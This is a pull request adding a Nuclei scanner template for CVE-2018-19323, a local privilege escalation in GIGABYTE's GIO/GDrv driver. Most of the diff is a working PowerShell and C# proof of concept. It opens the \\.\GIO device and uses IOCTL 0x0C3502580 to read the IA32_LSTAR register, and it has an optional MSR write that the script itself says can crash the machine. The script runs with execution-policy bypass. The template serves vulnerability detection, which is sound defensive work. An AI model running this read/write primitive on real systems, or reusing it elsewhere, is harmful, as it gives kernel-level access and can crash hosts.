### PR TITLE
CVE-2018-19323 – GIGABYTE GIO/GDrv MSR access (local EoP) – code PoC

### DIFF
--- a/code/cves/2018/CVE-2018-19323.yaml
+++ b/code/cves/2018/CVE-2018-19323.yaml
@@ -1,0 +1,166 @@
+id: CVE-2018-19323
+
+info:
+  name: GIGABYTE GIO/GDrv - MSR Read/Write (Local EoP)
+  author: imBios
+  severity: critical
+  description: |
+    GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose an IOCTL that allows unprivileged access to Machine Specific Registers (MSR) via the GIO/GDrv driver, enabling local privilege escalation. This template performs a local PoC by opening \\.\\GIO and issuing IOCTL 0x0C3502580 to read IA32_LSTAR (0xC0000082). Optional write can be enabled to demonstrate impact (disabled by default).
+  impact: |
+    Local attackers can manipulate MSRs to execute arbitrary kernel-mode code, bypassing security boundaries and escalating privileges.
+  remediation: |
+    Update GIGABYTE software to fixed versions or later. Remove/disable vulnerable drivers. Enforce driver signing and limit low-integrity access to device objects.
+  reference:
+    - https://seclists.org/fulldisclosure/2018/Dec/39
+    - https://www.gigabyte.com/Support/Security/1801
+  classification:
+    cve-id: CVE-2018-19323
+    cwe-id: CWE-782
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: false
+    vendor: gigabyte
+    product: app-center,aorus-graphics-engine,xtreme-gaming-engine,oc-guru-ii
+  tags: cve,cve2018,windows,driver,gio,gdrv,msr,privesc,code
+
+self-contained: true
+
+variables:
+  MSR: "0xC0000082" # IA32_LSTAR
+  WRITE: "false" # set to true to attempt a write (dangerous)
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      $ErrorActionPreference = 'Stop'
+
+      $msrId = [UInt32]([Convert]::ToUInt32("{{MSR}}".Replace('0x',''),16))
+      $doWrite = "{{WRITE}}" -eq 'true'
+
+      $code = @"
+      using System;
+      using System.Runtime.InteropServices;
+      using Microsoft.Win32.SafeHandles;
+
+      public static class GigabyteGIO
+      {
+          // IOCTL for MSR access from advisory CORE-2018-0007
+          public const uint IOCTL_GIO_MSRACCESS = 0x0C3502580;
+
+          [StructLayout(LayoutKind.Sequential, Pack=1)]
+          public struct GIO_MSRIO_STRUCT
+          {
+              public UInt32 rw;  // 0 read, 1 write (as per advisory PoC had reversed labels in text; we validate empirically)
+              public UInt32 reg; // MSR index
+              public UInt64 value;
+          }
+
+          [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+          private static extern SafeFileHandle CreateFileW(
+              string lpFileName,
+              uint dwDesiredAccess,
+              uint dwShareMode,
+              IntPtr lpSecurityAttributes,
+              uint dwCreationDisposition,
+              uint dwFlagsAndAttributes,
+              IntPtr hTemplateFile);
+
+          [DllImport("kernel32.dll", SetLastError=true)]
+          private static extern bool DeviceIoControl(
+              SafeFileHandle hDevice,
+              uint dwIoControlCode,
+              ref GIO_MSRIO_STRUCT lpInBuffer,
+              int nInBufferSize,
+              [Out] byte[] lpOutBuffer,
+              int nOutBufferSize,
+              out uint lpBytesReturned,
+              IntPtr lpOverlapped);
+
+          public static SafeFileHandle OpenGIO()
+          {
+              const uint GENERIC_READ  = 0x80000000;
+              const uint GENERIC_WRITE = 0x40000000;
+              const uint FILE_SHARE_READ  = 0x00000001;
+              const uint FILE_SHARE_WRITE = 0x00000002;
+              const uint OPEN_EXISTING    = 3;
+              var handle = CreateFileW(@"\\.\\GIO", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);
+              return handle;
+          }
+
+          public static bool Rdmsr(UInt32 reg, out UInt64 value)
+          {
+              value = 0UL;
+              var inbuf = new GIO_MSRIO_STRUCT { rw = 1, reg = reg, value = 0UL };
+              var outbuf = new byte[16];
+              uint ret;
+              using (var h = OpenGIO())
+              {
+                  if (h == null || h.IsInvalid) return false;
+                  if (!DeviceIoControl(h, IOCTL_GIO_MSRACCESS, ref inbuf, Marshal.SizeOf(inbuf), outbuf, outbuf.Length, out ret, IntPtr.Zero))
+                      return false;
+                  if (ret >= 8)
+                  {
+                      value = BitConverter.ToUInt64(outbuf, 0);
+                      return true;
+                  }
+                  return false;
+              }
+          }
+
+          public static bool Wrmsr(UInt32 reg, UInt64 value)
+          {
+              var inbuf = new GIO_MSRIO_STRUCT { rw = 0, reg = reg, value = value };
+              var outbuf = new byte[16];
+              uint ret;
+              using (var h = OpenGIO())
+              {
+                  if (h == null || h.IsInvalid) return false;
+                  return DeviceIoControl(h, IOCTL_GIO_MSRACCESS, ref inbuf, Marshal.SizeOf(inbuf), outbuf, outbuf.Length, out ret, IntPtr.Zero);
+              }
+          }
+      }
+      "@;
+
+      if (-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetTypes().Name -contains 'GigabyteGIO' })) {
+        Add-Type -TypeDefinition $code -Language CSharp
+      }
+
+      # Read MSR value
+      $val = 0
+      $ok = [GigabyteGIO]::Rdmsr($msrId, [ref]$val)
+      if (-not $ok) {
+        Write-Output "GIO_MSRACCESS read failed or driver not present"
+        return
+      }
+      Write-Output ("MSR {0:X8} = 0x{1:X16}" -f $msrId, $val)
+
+      if ($doWrite) {
+        # DANGEROUS: writing garbage to IA32_LSTAR causes instant crash/BSOD; gate by env
+        $pattern = 0xFFFF1111FFFF2222
+        $okw = [GigabyteGIO]::Wrmsr($msrId, [UInt64]$pattern)
+        Write-Output ("WriteResult={0}" -f $okw)
+      }
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "MSR [0-9A-F]{8} = 0x[0-9A-F]{16}"
+
+    matchers:
+      - type: word
+        words:
+          - "MSR C0000082 ="
+
+    # Debug usage:
+    # nuclei -t code/cves/2018/CVE-2018-19323.yaml -debug -duc -var WRITE=false
+    # Set WRITE=true to attempt a write (may BSOD). Default is read-only.


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2018-19323
- GIGABYTE GIO/GDrv MSR access (local EoP) with code PoC
- References:
  - https://seclists.org/fulldisclosure/2018/Dec/39
  - https://www.gigabyte.com/Support/Security/1801

/claim #12680
fix #12680

### Template Validation
- [x] YES (local read-only PoC)
- [ ] NO

#### Additional Details
- Usage (read-only):
  nuclei -t code/cves/2018/CVE-2018-19323.yaml -debug -duc -var WRITE=false
- Dangerous write (may BSOD, use sacrificial VM):
  nuclei -t code/cves/2018/CVE-2018-19323.yaml -debug -duc -var WRITE=true
- Not version-based. Matches on successful MSR read output.
